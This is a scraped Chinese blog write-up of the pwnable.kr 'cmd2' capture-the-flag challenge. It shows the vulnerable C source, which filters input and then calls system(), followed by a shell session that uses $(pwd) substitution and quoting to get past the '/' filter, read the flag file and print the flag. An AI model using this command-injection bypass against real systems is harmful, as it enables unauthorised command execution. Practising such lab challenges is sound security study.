zoukankan      html  css  js  c++  java

  • #pwnable#cmd2

    cmd2@pwnable:~$ cat cmd2.c
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
 int r=0;
 r += strstr(cmd, "=")!=0;
 r += strstr(cmd, "PATH")!=0;
 r += strstr(cmd, "export")!=0;
 r += strstr(cmd, "/")!=0;
 r += strstr(cmd, "`")!=0;
 r += strstr(cmd, "flag")!=0;
 return r;
}

extern char** environ;
void delete_env(){
 char** p;
 for(p=environ; *p; p++)    memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
 delete_env();
 putenv("PATH=/no_command_execution_until_you_become_a_hacker");
 if(filter(argv[1])) return 0;
 printf("%s
", argv[1]);
 system( argv[1] );
 return 0;
}

    解题过程:

    cmd2@pwnable:/$ pwd
/
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)flag
> ^C
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)flag"
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
cmd2@pwnable:/$ /home/cmd2
cmd2/ cmd2_pwn/ 
cmd2@pwnable:/$ /home/cmd2/cmd2 'test'
test
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)"
cmd2@pwnable:/$ /home/cmd2/cmd2 '"$(pwd)"'
"$(pwd)"
sh: 1: /: Permission denied
cmd2@pwnable:/$ /home/cmd2/cmd2 '"$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"'
"$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
sh: 1: /tmp/gwcmd2/bbb /tmp/gwcmd2/ccc: not found
cmd2@pwnable:/$ ls /tmp/gwcmd2/
aaaaa bbb ccc
cmd2@pwnable:/$ ls /tmp/gwcmd2/ -al
total 342244
drwxrwxr-x 2 cmd2 cmd2 4096 Mar 26 11:05 .
drwxrwx-wt 1708 root root 350445568 Mar 26 11:34 ..
lrwxrwxrwx 1 cmd2 cmd2 15 Mar 26 11:05 aaaaa -> /home/cmd2/cmd2
lrwxrwxrwx 1 cmd2 cmd2 8 Mar 26 11:05 bbb -> /bin/cat
lrwxrwxrwx 1 cmd2 cmd2 15 Mar 26 11:05 ccc -> /home/cmd2/flag
cmd2@pwnable:/$ ./tmp/gwcmd2/bbb 'test'
./tmp/gwcmd2/bbb: test: No such file or directory
cmd2@pwnable:/$ /home/cmd2/cmd2 '""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""'
""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""
FuN_w1th_5h3ll_v4riabl3s_haha
cmd2@pwnable:/$ /home/cmd2/cmd2 ""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""
cmd2@pwnable:/$ /home/cmd2/cmd2 '$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc'
$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc
FuN_w1th_5h3ll_v4riabl3s_haha

    必须要 '"" xxx ""' 才能被正确执行?
    ""xx"" 会被过滤
    '"xx"' 提示 not found
    ' ' 也可以哦
    所以要用单引号,否则可能内容被解释了。

    不过能想到切换根目录,用 $(pwd) 绕过 '/' 的思路,也是够牛逼了,还要懂特殊的shell命令格式。
  • 相关阅读:
    解决Failure to transfer org.apache.maven.plugins:maven-surefire-plugin:pom:2.12.4
    spring task:annotation-driven 定时任务
    Windows注意目录
    vbScript 备忘
    java 将字符串数组变为字典顺序排序后的字符串数组
    jquery选中以什么开头的元素
    java如何将毫秒数转为相应的年月日格式
    jstl foreach 取index
    jQuery 效果
    js判断一个字符串是以某个字符串开头
  • 原文地址:https://www.cnblogs.com/handt/p/12590199.html
Copyright © 2011-2022 走看看